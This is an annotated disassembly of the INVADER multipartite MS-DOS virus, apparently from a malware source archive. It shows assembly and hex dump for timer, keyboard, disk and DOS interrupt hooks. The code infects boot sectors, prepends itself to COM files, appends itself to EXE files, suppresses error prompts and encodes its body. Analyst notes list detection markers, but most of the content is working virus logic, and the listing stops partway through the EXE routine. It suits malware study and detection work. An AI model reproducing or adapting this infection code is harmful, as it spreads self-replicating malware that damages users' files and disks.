MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.invdanub.asm
2021-01-12 17:47:04 -06:00


;---------------------------------------------------------------------
; INVADER virus, obtained 21 Aug 1991 from the library (Baran)
; It is a combined (multipartite) virus that attacks the BOOT sector and
; .COM and .EXE files. The EXE part of the virus is inspired by the
; JERUSALEM B virus.
;---------------------------------------------------------------------
AX=0000 BX=0000 CX=1064 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=48C5 ES=48C5 SS=48C5 CS=48C5 IP=0100 NV UP EI PL NZ NA PO NC
-10:0100 E92E0B JMP 0C31
0000 E9 2E 0B 01 00 F5 54 61-28 99 05 00 00 00 14 17 i....uTa(.......
0010 E0 41 90 19 64 00 C5 48-00 00 03 00 B8 00 50 01 `A..d.EH....8.P.
0020 8F 20 20 20 20 20 20 20-20 20 20 20 20 20 90 19 . ..
0030 20 20 20 20 20 20 20 20-01 00 34 0E 60 61 00 01 ..4.`a..
0040 20 20 F5 68 50 0D 41 00-00 25 01 00 00 00 00 01 uhP.A..%......
0050 50 41 43 41 44 2E 45 58-45 43 4F 4D 4D 41 4E 44 PACAD.EXECOMMAND
0060 2E 43 4F 4D 2E 43 4F 4D-2E 45 58 45 10 00 00 02 .COM.COM.EXE....
0070 00 00 80 00 30 BD 5C 00-30 BD 6C 00 30 BD 62 79 ....0=\.0=l.0=by
0080 20 49 6E 76 61 64 65 72-2C 20 46 65 6E 67 20 43 Invader, Feng C
0090 68 69 61 20 55 2E 2C 20-57 61 72 6E 69 6E 67 3A hia U., Warning:
00A0 20 44 6F 6E 27 74 20 72-75 6E 20 41 43 41 44 2E Don't run ACAD.
00B0 45 58 45 21 D8 0F 8E 0C-90 0A 90 0A 24 00 48 05 EXE!X.......$.H.
00C0 24 00 48 05 24 00 47 06-24 00 47 06 24 00 D8 0F $.H.$.G.$.G.$.X.
00D0 D8 0F 8E 0C 90 0A 90 0A-24 00 48 05 24 00 48 05 X.......$.H.$.H.
00E0 24 00 ED 05 24 00 ED 05-24 00 C1 10 C1 10 1D 0E $.m.$.m.$.A.A...
00F0 69 09 69 09 24 00 B4 04-24 00 B4 04 24 00 ED 05 i.i.$.4.$.4.$.m.
;=====================================================================
; Interrupt 8H (timer tick) handler
;
; Analyst notes (debugger-style listing, offsets relative to the virus
; base; bare numbers are hex):
;   CS:[003F] selects one of two behaviours, chosen in the routine at 0A5E:
;     != 1 : a busy-wait of CS:[0003] iterations on every tick; the count
;            grows by one per tick until it exceeds the limit in CS:[003A],
;            so the machine gets progressively slower.
;     == 1 : CS:[0003] counts ticks; once it is above 8000h a note table is
;            played through the PC speaker (ports 43h/42h/61h).
;   [0048] == 1 silences the speaker (set while a file is being written).
;   Every path ends in the far JMP at 02D8, whose operand bytes at
;   02D9/02DB are overwritten with the previous INT 08h vector when the
;   hook is installed.
; Defensive relevance: unexplained slowdown or speaker output together
; with an INT 08h vector pointing into a small resident block.
;
; NOTE(review): the INT 3 at 02B3 is presumably a breakpoint left by the
; debugger that produced this dump, not original code - confirm.
02B3 INT 3
CMP Byte Ptr CS:[003F],01
JZ 02DD
PUSH AX
MOV AX,CS:[003A] ; delay ceiling
CMP CS:[0003],AX
JA 02CD
INC Word Ptr CS:[0003] ; delay grows by one per tick up to the ceiling
02CD PUSH CX
MOV CX,CS:[0003]
02D3 NOP
LOOP 02D3 ; busy-wait inside the timer interrupt
POP CX
POP AX
02D8 JMP 0DD5:00AB ; chain to the previous INT 08h handler (operand patched at install)
02DD INC Word Ptr CS:[0003]
CMP Word Ptr CS:[0003],8000
JA 02ED
JMP 02D8
02ED PUSH DS
PUSH AX
PUSH BX
PUSH CS
POP DS
CMP Byte Ptr [0048],01 ; busy flag set -> speaker off, no note this tick
JNZ 02FC
JMP 0332
NOP
02FC MOV BX,[004B] ; [004B] = index of the current note
DEC Byte Ptr [004A] ; [004A] = ticks left for the current note
JNZ 036D
IN AL,61
AND AL,FE ; clear bit 0 of port 61h (timer-2 gate to the speaker)
OUT 61,AL
MOV BX,[004B]
INC Word Ptr [004B]
CMP BX,0096 ; 96h entries played -> reset at 0352
JNZ 031D
JMP 0352
NOP
031D MOV AL,[BX+01E0] ; per-note duration table
MOV [004A],AL
SHL BX,1
MOV AX,[BX+00B4] ; per-note timer divisor table (word entries)
CMP AX,0000 ; divisor 0 = rest
JZ 0332
JMP 033B
0332 IN AL,61
AND AL,FE
OUT 61,AL
JMP 036D
NOP
033B MOV BX,AX
MOV AL,B6 ; control word B6h written to port 43h, divisor then goes to port 42h
OUT 43,AL
MOV AX,BX
OUT 42,AL
MOV AL,AH
OUT 42,AL
IN AL,61
OR AL,03 ; set bits 0 and 1 of port 61h: speaker on
OUT 61,AL
JMP 036D
0352 IN AL,61
AND AL,FE
OUT 61,AL
MOV Word Ptr [004B],0000 ; rewind the note index
MOV Byte Ptr [004A],01
MOV AX,8000
AND AH,[0005] ; new tick count is 8000h or 0000h depending on bit 7 of the key byte [0005]
MOV [0003],AX
036D POP BX
POP AX
POP DS
0370 JMP 02D8
;=====================================================================
; Interrupt 9H (keyboard) handler
;
; Analyst notes: watches for Ctrl+Alt+Del. The BIOS shift-state byte at
; 0000:0417 is tested for Ctrl and Alt (mask 0Ch) and the scan code from
; port 60h for Del (53h). When the combination is seen, AL (low byte of
; CS:[0003]) is compared with [0049] shifted right by 5, 4 or 1 bits;
; [0049] is the counter incremented by the routine at 0A58. If AL is not
; above that value, the keystroke is acknowledged (EOI to port 20h) and
; control goes to 03BE, which this listing elides. Otherwise the key is
; passed to the previous handler through the far JMP at 03B9 (operand
; at 03BA/03BC patched when the hook is installed).
;
0373 CLI
PUSH AX
PUSH DS
XOR AX,AX
MOV DS,AX
MOV AL,[0417] ; BIOS keyboard shift flags at 0000:0417
POP DS ; detect CTRL ALT DEL
AND AL,0C
CMP AL,0C ; Is it CTRL-ALT
JNZ 03B8
IN AL,60
AND AL,7F ; drop the key-release bit
CMP AL,53 ; Is it DEL
JNZ 03B8
MOV AX,CS:[0003]
MOV AH,[0049] ; NOTE(review): no CS: override shown here, so DS is the interrupted program's - confirm against the bytes
MOV CL,05
CMP Byte Ptr CS:[003F],01
JNZ 03AB
MOV CL,04
Word Ptr CS:[0003],8000 ; NOTE(review): mnemonic missing in the listing; presumably CMP, given the JB that follows
JB 03AB
MOV CL,01
03AB SHR AH,CL
CMP AL,AH
JA 03B8
03B1 MOV AL,20 ; end-of-interrupt to the interrupt controller
OUT 20,AL
JMP 03BE
03B8 POP AX
03B9 JMP 0DD5:0125 ; chain to the previous INT 09h handler
03BE PUSH CS
.
. CTRL ALT DEL HANDLING + helper procedures
.
;==========================================================
;
;
04C1 DB 0 ; attempt counter used by 04C4
04C2 DW ? ; saved AX (INT 13h function/count) for the retry
;
;----------------------------------------------------------
; Read with RESET and retry.
;
; In:  AX/BX/CX/DX/ES as for INT 13h. Out: CF set after the second
; failed attempt. Status bits outside mask C3h are not treated as errors.
; All disk access goes through 04E9, i.e. through the INT 13h vector
; that was saved at [0634] when the hook was installed, so the virus'
; own INT 13h handler is bypassed.
;
04C4 MOV Byte Ptr [04C1],00
MOV [04C2],AX
04CC CALL 04E9
AND AH,C3 ; also clears CF, so the success path returns CF=0
JZ 04E8
MOV AH,00 ; RESET
CALL 04E9 ;-------------------------------
MOV AX,[04C2]
INC Byte Ptr [04C1]
CMP Byte Ptr [04C1],01
JBE 04CC ; one retry only
STC
04E8 RET
04E9 PUSHF ; Call the original interrupt 13H
CALL FAR CS:[0634] ; handler.
RET
;=====================================================================
; Interrupt 13H handler
;
; Analyst notes: boot-sector infection is triggered by ordinary reads.
;   Trigger: AH=02 (read) of track 0 / head 0 / sector 2 on floppy
;   drives 0-2, or of head 1 / track 0 on a hard disk. The counter at
;   [0513] lets only every third such read through, and nothing is done
;   while the busy flag [0048] is 1.
;   Action: the boot sector is read into the buffer at 1000h (for a hard
;   disk, the boot sector of the active partition). The word 3CCBh at
;   boot-sector offset 3Eh is the "already infected" marker. Nine sectors
;   are then written from offset 0: the 1000h-byte virus body followed by
;   the buffer at 1000h, i.e. the original boot sector ends up as the
;   ninth sector (the boot code later reads "start sector + 8"). Finally
;   25h bytes starting at offset 3 of the original boot sector (the
;   BPB area) are copied into the virus boot image at 0E00h and that
;   image is written over the boot sector.
;   Storage: hard disk - track 0, head 0, from sector 7; floppy - a newly
;   formatted track 28h or 50h, chosen from the media byte at offset 15h.
; Defensive relevance: 3CCBh at offset 3Eh of a boot sector, a floppy
; with a formatted track past the normal last one, and writes to the
; hard disk's track 0 sectors 7-15 are the artefacts this code leaves.
;
04F0 80FC02 CMP AH,02 ; read operation ?
04F3 751B JNZ 0510
04F5 F6C280 TEST DL,80
04F8 751A JNZ 0514
04FA 80FA02 CMP DL,02
04FD 7711 JA 0510
04FF 83F902 CMP CX,+02 ; for a floppy: sector 2,
0502 750C JNZ 0510 ; track 0
0504 80FE00 CMP DH,00 ; head 0
0507 7507 JNZ 0510
0509 EB13 JMP 051E
050B 90 NOP
; [050C] = CX and [050E] = DX of the active partition's boot sector,
; filled in by the routine at 0638.
050C DB 01, 00, 80, 01
0510 E92001 JMP 0633 ; EXIT
; [0513] = qualifying-read counter.
; NOTE(review): the next two address labels read "513" and "0614" in the
; listing; from the surrounding addresses and the JNZ 0514 above they
; are presumably 0513 and 0514.
513 DB 00
0614 80FE01 CMP DH,01 ; for a hard disk: any sector
0517 75F7 JNZ 0510 ; head 1
0519 80FD00 CMP CH,00 ; track 0
051C 75F2 JNZ 0510
051E 2E803E130502 CMP Byte Ptr CS:[0513],02
0524 7407 JZ 052D
0526 2EFE061305 INC Byte Ptr CS:[0513]
052B EBE3 JMP 0510
052D 2EC606130500 MOV Byte Ptr CS:[0513],00
0533 2E803E480001 CMP Byte Ptr CS:[0048],01 ; busy flag: a file is being written
0539 74D5 JZ 0510
053B 50 PUSH AX
053C 53 PUSH BX
053D 51 PUSH CX
053E 52 PUSH DX
053F 56 PUSH SI
0540 57 PUSH DI
0541 06 PUSH ES
0542 1E PUSH DS
0543 8CC8 MOV AX,CS
0545 8ED8 MOV DS,AX
0547 8EC0 MOV ES,AX
0549 88164D00 MOV [004D],DL ; remember the drive
054D B400 MOV AH,00
054F E897FF CALL 04E9 ; RESET DEVICE
0552 BB0010 MOV BX,1000
0555 B80102 MOV AX,0201
0558 B90100 MOV CX,0001
055B B600 MOV DH,00
055D E889FF CALL 04E9 ; READ BOOT SECTOR
0560 7243 JB 05A5
0562 F6C280 TEST DL,80
0565 7405 JZ 056C
0567 E8CE00 CALL 0638 ; FOR A HARD DISK: BOOT SECTOR
056A 7239 JB 05A5 ; OF THE ACTIVE PARTITION
056C B8CB3C MOV AX,3CCB ; Is the virus present?
056F 39473E CMP [BX+3E],AX
0572 7518 JNZ 058C
; Marker found. NOTE(review): the meaning of the words at +40h/+42h is
; not stated in the listing; the code leaves the disk alone when +40h is
; FFFEh, and when (+40h - +42h) = 4 it reads one more sector via 066A.
0574 8B4740 MOV AX,[BX+40]
0577 3DFEFF CMP AX,FFFE
057A 7429 JZ 05A5
057C 2B4742 SUB AX,[BX+42]
057F 3D0400 CMP AX,0004
0582 7508 JNZ 058C
0584 E8E300 CALL 066A
0587 7303 JNB 058C
0589 E99F00 JMP 062B
058C F6064D0080 TEST Byte Ptr [004D],80
0591 7415 JZ 05A8
0593 C6064F0007 MOV Byte Ptr [004F],07 ; where to store the virus
0598 C606500000 MOV Byte Ptr [0050],00 ; on a hard disk
059D C6064E0000 MOV Byte Ptr [004E],00
05A2 EB3F JMP 05E3
05A4 90 NOP
05A5 E98300 JMP 062B
05A8 C6064F0001 MOV Byte Ptr [004F],01 ; where to store the virus
05AD C606500028 MOV Byte Ptr [0050],28 ; on a floppy
05B2 8A4715 MOV AL,[BX+15] ; media byte of the boot sector just read
05B5 3CFC CMP AL,FC
05B7 7305 JNB 05BE
05B9 C606500050 MOV Byte Ptr [0050],50
05BE A05000 MOV AL,[0050]
05C1 BB8F02 MOV BX,028F ; 9 four-byte entries at 028F: the track byte of each is patched
05C4 B90900 MOV CX,0009
05C7 8807 MOV [BX],AL ; On a floppy, also
05C9 83C304 ADD BX,+04 ; reformat track
05CC E2F9 LOOP 05C7 ; zero.
; NOTE(review): the original comment says track zero, but the track
; passed to INT 13h AH=05 comes from [0050], which is 28h or 50h here.
05CE B80905 MOV AX,0509
05D1 BB8F02 MOV BX,028F
05D4 C6064E0000 MOV Byte Ptr [004E],00
05D9 C6064F0001 MOV Byte Ptr [004F],01
05DE E8AD00 CALL 068E
05E1 7248 JB 062B
05E3 BB0000 MOV BX,0000 ; Write the virus.
05E6 A14F00 MOV AX,[004F]
05E9 A3440E MOV [0E44],AX ; sector/track of the stored body, kept inside the boot image
05EC A14D00 MOV AX,[004D]
05EF A3460E MOV [0E46],AX ; drive/head of the stored body
05F2 B80903 MOV AX,0309
05F5 E89600 CALL 068E ;-----------------------
05F8 7231 JB 062B
05FA C6064F0001 MOV Byte Ptr [004F],01
05FF C606500000 MOV Byte Ptr [0050],00
0604 F6C280 TEST DL,80
0607 740C JZ 0615
0609 A10C05 MOV AX,[050C] ; hard disk: target is the active partition's boot sector
060C A34F00 MOV [004F],AX
060F A10E05 MOV AX,[050E]
0612 A34D00 MOV [004D],AX
0615 BE0310 MOV SI,1003 ; copy 25h bytes from offset 3 of the original boot sector
0618 BF030E MOV DI,0E03 ; into the virus boot image, so the disk parameters stay valid
061B B92500 MOV CX,0025
061E 90 NOP
061F FC CLD
0620 F3A4 REPZ MOVSB
0622 BB000E MOV BX,0E00 ; Write the virus into the BOOT sector.
0625 B80103 MOV AX,0301
0628 E86300 CALL 068E
062B 1F POP DS
062C 07 POP ES
062D 5F POP DI
062E 5E POP SI
062F 5A POP DX
0630 59 POP CX
0631 5B POP BX
0632 58 POP AX
0633 EA88227000 JMP 0070:2288 ; chain to the previous INT 13h handler (operand at 0634 patched at install)
;------------------------------------------------------------------
; For a hard disk: find the active PARTITION and load its BOOT sector.
;
; 0638: scans the four 10h-byte partition entries at offset 1BEh of the
;       sector in the buffer at 1000h. An entry whose first byte is 80h
;       is taken as active; a first byte other than 00h/80h, or no
;       active entry, returns CF=1. The entry's first two words are
;       saved at [050E]/[050C] and used as DX/CX for a one-sector read
;       into 1000h.
; 066A: converts the value at [BX+40] into sector/head/track by dividing
;       by the words at boot-sector offsets 18h and 1Ah, stores them in
;       [004F]/[004E]/[0050] and reads that sector into 1000h.
; 068E: INT 13h call with CX=[004F] and DX=[004D] through the retry
;       wrapper at 04C4.
;
0638 MOV SI,11BE
MOV BL,04
063D CMP Byte Ptr [SI],80
JZ 0650
CMP Byte Ptr [SI],00
JNZ 064E
ADD SI,+10
DEC BL
JNZ 063D
064E STC
RET
0650 MOV AX,[SI]
MOV [050E],AX
MOV AX,[SI+02]
MOV [050C],AX
MOV DX,[SI] ; low byte is the 80h flag, which is also the first hard-disk drive number
MOV CX,[SI+02]
MOV AX,0201
MOV BX,1000
CALL 04C4
RET
066A 8B4740 MOV AX,[BX+40]
066D 33D2 XOR DX,DX
066F F77718 DIV Word Ptr [BX+18]
0672 FEC2 INC DL ; sector numbers are 1-based
0674 88164F00 MOV [004F],DL
0678 33D2 XOR DX,DX
067A F7771A DIV Word Ptr [BX+1A]
067D 88164E00 MOV [004E],DL
0681 A25000 MOV [0050],AL
0684 B80102 MOV AX,0201
0687 BB0010 MOV BX,1000
068A E80100 CALL 068E
068D C3 RET
068E 8B0E4F00 MOV CX,[004F]
0692 8B164D00 MOV DX,[004D]
0696 E82BFE CALL 04C4
0699 C3 RET
;=====================================================================
; Interrupt 21H handler
;
; Analyst notes:
;   AX=4243h  residency check: the handler answers AX=5678h. A scanner
;             can use the same call to detect the resident copy.
;   AX=4244h  issued by the COM entry code when a resident copy exists:
;             the caller's CS is taken from the interrupt frame and
;             patched into the far JMP at 06DA, REP MOVSB moves the host
;             image down over the virus (SI/DI/CX set by the caller),
;             registers are cleared and the host is entered at offset 100h.
;   AX=4B00h  (EXEC) and AX=3D00h (open, read-only) both lead to the
;             infection routine at 06DF; [003E]=1 marks the virus' own
;             open call so that it is not re-entered.
;   Everything else is passed to the previous handler through the far
;   JMP at 06C4 (operand at 06C5/06C7 patched when the hook is installed).
;
069A 9C PUSHF
069B 3D4342 CMP AX,4243 ; virus presence test
069E 7505 JNZ 06A5
06A0 B87856 MOV AX,5678
06A3 9D POPF
06A4 CF IRET
06A5 3D4442 CMP AX,4244
06A8 741F JZ 06C9
06AA 3D004B CMP AX,4B00 ; EXEC
06AD 7503 JNZ 06B2
06AF EB2E JMP 06DF
06B1 90 NOP
06B2 3D003D CMP AX,3D00
06B5 750B JNZ 06C2
06B7 2E803E3E0001 CMP Byte Ptr [003E],01 ; the 2E opcode byte is a CS: override not shown in the operand
06BD 7403 JZ 06C2
06BF EB1E JMP 06DF
; NOTE(review): the INT 3 (CC) at 06C2 is presumably a debugger
; breakpoint left in the dump rather than original code - confirm.
06C2 CC INT 3
06C3 9D POPF
06C4 EA14021C10 JMP 101C:0214
06C9 58 POP AX ; discard the flags pushed at 069A
06CA 58 POP AX ; discard the caller's IP
06CB 58 POP AX ; AX = caller's CS
06CC 2EA3DD06 MOV CS:[06DD],AX ; becomes the segment of the far JMP at 06DA
06D0 F3A4 REPZ MOVSB
06D2 9D POPF
06D3 E87703 CALL 0A4D
06D6 8B0E1400 MOV CX,[0014]
06DA EA0001EE13 JMP 13EE:0100
;====================================================================
; EXEC service handler
;
; Analyst notes (common part of file infection, reached for EXEC and for
; read-only open):
;   1. The file name at DS:DX is upper-cased in place in the caller's
;      buffer.
;   2. Names ending in the string at 0059h (COMMAND.COM) are skipped.
;      Names ending in the string at 0051h (ACAD.EXE) are not infected
;      either; instead the counter at [0049] is incremented and the
;      timer-handler parameters [003A] or [0003] are raised.
;   3. Only names ending in .COM ([001B]=0) or .EXE ([001B]=1) continue.
;   4. Free disk space is checked (at least 1000h bytes).
;   5. The word at file offset 12h is read; 1990h means "already
;      infected" and the file is left alone.
;   6. INT 24h is pointed at 0A27 so that critical errors produce no
;      prompt, the attributes are cleared, the file is reopened
;      read/write and its date/time are saved for later restoration.
; The chain of JB instructions (0767, 07D8, 0841, 087E, ...) forwards a
; set carry flag from any failed step down to the clean-up code.
; Defensive relevance: the 1990h word at offset 12h is the file-level
; infection marker; attribute, date and time are restored afterwards,
; so only the size and content of the file change.
;
06DF 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF ; [000A] = file handle, FFFF = none
06E6 2EC70638000000 MOV Word Ptr CS:[0038],0000 ; [0038] = "memory block allocated" flag
06ED 2E89160600 MOV CS:[0006],DX ; [0006]/[0008] = far pointer to the file name
06F2 2E8C1E0800 MOV CS:[0008],DS
06F7 50 PUSH AX
06F8 53 PUSH BX
06F9 51 PUSH CX
06FA 52 PUSH DX
06FB 56 PUSH SI
06FC 57 PUSH DI
06FD 1E PUSH DS
06FE 06 PUSH ES
06FF FC CLD
0700 8BF2 MOV SI,DX
0702 8A04 MOV AL,[SI] ; convert the name to upper
0704 0AC0 OR AL,AL ; case.
0706 740E JZ 0716
0708 3C61 CMP AL,61 ;'a'
070A 7207 JB 0713
070C 3C7A CMP AL,7A ;'z'
070E 7703 JA 0713
0710 802C20 SUB Byte Ptr [SI],20 ;' '
0713 46 INC SI
0714 EBEC JMP 0702
0716 2E89363C00 MOV CS:[003C],SI ; pointer past the name
071B 8BC6 MOV AX,SI
071D 0E PUSH CS
071E 07 POP ES
071F B90B00 MOV CX,000B
0722 2BF1 SUB SI,CX
0724 BF5900 MOV DI,0059 ; COMMAND.COM is not attacked
0727 F3A6 REPZ CMPSB
0729 7503 JNZ 072E
072B E9EA02 JMP 0A18
072E 8BF0 MOV SI,AX
0730 B90800 MOV CX,0008
0733 2BF1 SUB SI,CX
0735 BF5100 MOV DI,0051
0738 F3A6 REPZ CMPSB ; nor ACAD.EXE
073A 751F JNZ 075B
073C E81903 CALL 0A58 ; ACAD.EXE seen: bump the counter at [0049]
073F 2E803E3F0001 CMP Byte Ptr CS:[003F],01
0745 7409 JZ 0750
0747 2E83063A001E ADD Word Ptr CS:[003A],+1E ; raise the delay ceiling used by the INT 08h handler
074D EB08 JMP 0757
074F 90 NOP
0750 2E810603000004 ADD Word Ptr CS:[0003],0400 ; advance the tick counter used by the INT 08h handler
0757 F9 STC
0758 EB0D JMP 0767
075A 90 NOP
075B B80043 MOV AX,4300 ; file attributes
075E CD21 INT 21 ;----------------------
0760 7205 JB 0767
0762 2E890E0C00 MOV CS:[000C],CX ; original attributes, restored at 0A04
0767 726F JB 07D8
0769 32C0 XOR AL,AL
076B 2EA21B00 MOV CS:[001B],AL ; [001B] = file type: 0 = COM, 1 = EXE
076F 2E8B363C00 MOV SI,CS:[003C]
0774 B90400 MOV CX,0004
0777 2BF1 SUB SI,CX
0779 BF6400 MOV DI,0064 ; compare with .COM
077C F3A6 REPZ CMPSB
077E 741A JZ 079A
0780 2EFE061B00 INC Byte Ptr CS:[001B]
0785 2E8B363C00 MOV SI,CS:[003C]
078A B90400 MOV CX,0004
078D 2BF1 SUB SI,CX
078F BF6800 MOV DI,0068
0792 F3A6 REPZ CMPSB ; and .EXE
0794 7404 JZ 079A
0796 F9 STC
0797 EB3F JMP 07D8
0799 90 NOP
079A 8BFA MOV DI,DX
079C 32D2 XOR DL,DL ; DL = 0: default drive
079E 807D013A CMP Byte Ptr [DI+01],3A ;':'
07A2 7505 JNZ 07A9
07A4 8A15 MOV DL,[DI]
07A6 80E21F AND DL,1F ; drive letter -> drive number
07A9 B436 MOV AH,36 ; Get free space
07AB CD21 INT 21 ; on the disk.
07AD 3DFFFF CMP AX,FFFF ;
07B0 7503 JNZ 07B5 ;
07B2 E96302 JMP 0A18 ;
07B5 F7E3 MUL BX ;
07B7 F7E1 MUL CX ;
07B9 0BD2 OR DX,DX ;
07BB 7505 JNZ 07C2 ;
07BD 3D0010 CMP AX,1000 ;
07C0 72F0 JB 07B2 ;----------------------
07C2 2E8B160600 MOV DX,CS:[0006]
07C7 B8003D MOV AX,3D00 ; open the file
07CA 2EC6063E0001 MOV Byte Ptr CS:[003E],01 ; re-entrancy guard tested at 06B7
07D0 CD21 INT 21
07D2 2EC6063E0000 MOV Byte Ptr CS:[003E],00
07D8 7267 JB 0841
07DA 2EA30A00 MOV CS:[000A],AX
07DE 8BD8 MOV BX,AX
07E0 B80242 MOV AX,4202 ; SEEK to end - 5
07E3 B9FFFF MOV CX,FFFF
07E6 BAFBFF MOV DX,FFFB
07E9 CD21 INT 21
07EB 7254 JB 0841
07ED 050500 ADD AX,0005
07F0 2EA31400 MOV CS:[0014],AX ; [0014] = low word of the file length
07F4 B80042 MOV AX,4200
07F7 B90000 MOV CX,0000 ; SEEK to start + 12
07FA BA1200 MOV DX,0012
07FD CD21 INT 21
07FF 7240 JB 0841
0801 B90200 MOV CX,0002
0804 BA3600 MOV DX,0036
0807 8BFA MOV DI,DX
0809 8CC8 MOV AX,CS
080B 8ED8 MOV DS,AX
080D 8EC0 MOV ES,AX
080F B43F MOV AH,3F ; read 2 bytes
0811 CD21 INT 21
0813 8B05 MOV AX,[DI]
0815 3D9019 CMP AX,1990 ; If they are 1990, we stop.
0818 7507 JNZ 0821
081A B43E MOV AH,3E
081C CD21 INT 21
081E E9F701 JMP 0A18
0821 B82435 MOV AX,3524 ; redefine interrupt 24H
0824 CD21 INT 21
0826 891E230A MOV [0A23],BX ; previous INT 24h vector, restored at 0A0E
082A 8C06250A MOV [0A25],ES
082E BA270A MOV DX,0A27
0831 B82425 MOV AX,2524
0834 CD21 INT 21 ;--------------------------
0836 C5160600 LDS DX,[0006]
083A 33C9 XOR CX,CX ; CX = 0: clears every attribute, including read-only
083C B80143 MOV AX,4301 ; set attributes
083F CD21 INT 21
0841 723B JB 087E
0843 2E8B1E0A00 MOV BX,CS:[000A]
0848 B43E MOV AH,3E ; close the file
084A CD21 INT 21
084C 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF
0853 B8023D MOV AX,3D02 ; open in R/W mode
0856 CD21 INT 21
0858 7224 JB 087E
085A 2EA30A00 MOV CS:[000A],AX
085E 8CC8 MOV AX,CS
0860 8ED8 MOV DS,AX
0862 8EC0 MOV ES,AX
0864 8B1E0A00 MOV BX,[000A]
0868 B80057 MOV AX,5700 ; date of last modification
086B CD21 INT 21
086D 89160E00 MOV [000E],DX ; saved date, restored at 09F6
0871 890E1000 MOV [0010],CX ; saved time
0875 B80042 MOV AX,4200 ; seek to start
0878 33C9 XOR CX,CX
087A 8BD1 MOV DX,CX
087C CD21 INT 21
087E 7255 JB 08D5
0880 803E1B0000 CMP Byte Ptr [001B],00 ; 0 = COM (fall through), otherwise EXE
0885 7403 JZ 088A
0887 EB6B JMP 08F4
;---------------------------------------------------------------
; HANDLING of .COM files.
;
; Analyst notes: the virus is prepended. A 1000h-paragraph block is
; allocated, the 1000h-byte virus body is copied to its start with the
; region 0051h..02B2h XOR-encoded (routine 0A2A, key byte [0005] taken
; from the low byte of the tick counter with bit 0 forced on), the host
; file is read in behind it at offset 1000h, and the whole block is
; written back from the start of the file. Files for which
; 1000h + length overflows 16 bits are left untouched.
; Defensive relevance: an infected COM file is exactly 1000h bytes
; longer, starts with a near JMP into the virus entry code, and carries
; the word 1990h at offset 12h; the original program follows intact at
; offset 1000h.
;
088A BB0010 MOV BX,1000
088D B448 MOV AH,48 ; DOS allocate memory
088F CD21 INT 21
0891 730B JNB 089E
0893 B43E MOV AH,3E ; allocation failed: close the file and leave
0895 8B1E0A00 MOV BX,[000A]
0899 CD21 INT 21
089B E97A01 JMP 0A18
089E FF063800 INC Word Ptr [0038] ; remember that a block must be freed at 09DB
08A2 8EC0 MOV ES,AX
08A4 33F6 XOR SI,SI
08A6 8BFE MOV DI,SI
08A8 A10300 MOV AX,[0003]
08AB 0C01 OR AL,01 ; key byte is never zero
08AD A20500 MOV [0005],AL
08B0 C606480001 MOV Byte Ptr [0048],01 ; busy flag: the INT 08h/13h handlers stay passive
08B5 E87201 CALL 0A2A ; encode the resident copy
08B8 B90010 MOV CX,1000
08BB F3A4 REPZ MOVSB ; copy the encoded body into the block
08BD E86A01 CALL 0A2A ; decode the resident copy again
08C0 C606480000 MOV Byte Ptr [0048],00
08C5 8BD7 MOV DX,DI ; DI = 1000h after the copy
08C7 8B0E1400 MOV CX,[0014]
08CB 8B1E0A00 MOV BX,[000A]
08CF 06 PUSH ES
08D0 1F POP DS
08D1 B43F MOV AH,3F ; read the host behind the virus body
08D3 CD21 INT 21
08D5 7215 JB 08EC
08D7 03F9 ADD DI,CX
08D9 7211 JB 08EC ; combined image would exceed 64 KB
08DB 33C9 XOR CX,CX
08DD 8BD1 MOV DX,CX
08DF B80042 MOV AX,4200
08E2 CD21 INT 21
08E4 8BCF MOV CX,DI
08E6 33D2 XOR DX,DX
08E8 B440 MOV AH,40 ; write virus + host back to the file
08EA CD21 INT 21
08EC 7210 JB 08FE
08EE E86701 CALL 0A58
08F1 E9DF00 JMP 09D3
;---------------------------------------------------------------
; HANDLING of .EXE files.
;
; Analyst notes: the virus is appended and the header is redirected.
;   - The 1Ch-byte header is read to 001Ch. The word at header offset 12h
;     (checksum field, here [002E]) is the infection marker 1990h.
;   - The host's SS, SP, IP and CS are saved inside the virus body
;     ([0042], [0040], [0BA6], [0BA8]; the last two are the operand of
;     the far JMP at 0BA5).
;   - The image length is computed from the page count and last-page
;     bytes, rounded up to a paragraph ([0044]/[0046]), and 1000h is
;     added for the virus; page count and last-page bytes are rewritten.
;   - New entry: CS = SS = (rounded length / [006C]) - header size,
;     IP = 0B63h, SP = 0DFEh.
;   - The header is written back, then the body (data region
;     XOR-encoded by 0A2A) is written at the rounded end of the file.
; Clean-up from 09D3: frees the COM work block, restores the file
; date/time and attributes, closes the file, restores INT 24h and
; chains to DOS.
; Defensive relevance: header checksum field = 1990h, entry IP = 0B63h
; and CS equal to SS are static indicators visible without running
; the file.
;
08F4 B91C00 MOV CX,001C ; load the .EXE header
08F7 BA1C00 MOV DX,001C
08FA B43F MOV AH,3F
08FC CD21 INT 21
08FE 7252 JB 0952
0900 813E2E009019 CMP Word Ptr [002E],1990 ; checksum
0906 744A JZ 0952 ; NOTE(review): CF is clear on this path, so an already-marked file appears to fall through at 0952 - confirm
0908 C7062E009019 MOV Word Ptr [002E],1990
090E A12A00 MOV AX,[002A] ; SS
0911 A34200 MOV [0042],AX
0914 A12C00 MOV AX,[002C] ; SP
0917 A34000 MOV [0040],AX
091A A13000 MOV AX,[0030] ; IP
091D A3A60B MOV [0BA6],AX
0920 A13200 MOV AX,[0032] ; CS
0923 A3A80B MOV [0BA8],AX
0926 A12000 MOV AX,[0020] ; number of blocks
0929 833E1E0000 CMP Word Ptr [001E],+00
092E 7401 JZ 0931
0930 48 DEC AX
0931 F7266E00 MUL Word Ptr [006E]
0935 03061E00 ADD AX,[001E] ; bytes in the last block
0939 83D200 ADC DX,+00
093C 050F00 ADD AX,000F
093F 83D200 ADC DX,+00
0942 25F0FF AND AX,FFF0 ; round up to a paragraph boundary
0945 A34400 MOV [0044],AX ; [0044]/[0046] = file offset where the body is written
0948 89164600 MOV [0046],DX
094C 050010 ADD AX,1000 ; plus the length of the virus body
094F 83D200 ADC DX,+00
0952 723A JB 098E
0954 F7366E00 DIV Word Ptr [006E]
0958 0BD2 OR DX,DX
095A 7401 JZ 095D
095C 40 INC AX
095D A32000 MOV [0020],AX ; new page count
0960 89161E00 MOV [001E],DX ; new bytes-in-last-page
0964 A14400 MOV AX,[0044]
0967 8B164600 MOV DX,[0046]
096B F7366C00 DIV Word Ptr [006C]
096F 2B062400 SUB AX,[0024] ; minus header size in paragraphs
0973 A33200 MOV [0032],AX ; new CS
